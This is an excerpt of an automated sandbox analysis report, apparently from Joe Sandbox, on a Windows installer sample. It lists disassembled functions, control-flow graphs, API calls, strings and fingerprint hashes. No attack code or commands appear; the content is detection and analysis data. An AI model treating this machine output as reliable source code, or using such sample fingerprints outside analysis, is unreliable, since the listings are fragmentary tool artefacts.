                                                                                                                                                                                                                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                      • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                                                                                                                                                                                                                                      Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                      • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                      • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                      • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                      • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                      • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                      • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                      • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                      • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                      • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                      • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                      • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                      • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                                                                                                                                                                                      Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                      • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                                                                                                                                                                                                                                      Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                      • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                      • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                      • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                      • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                                                                                                                                                                                                                                      Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,KsUtilizeBuildings,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,KsUtilizeBuildings,KsUtilizeBuildings,00000000,00000000,KsUtilizeBuildings,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,004279E0,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,004279E0,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$KsUtilizeBuildings
                                                                                                                                                                                                                                                                                      • API String ID: 4286501637-2167018182
                                                                                                                                                                                                                                                                                      • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
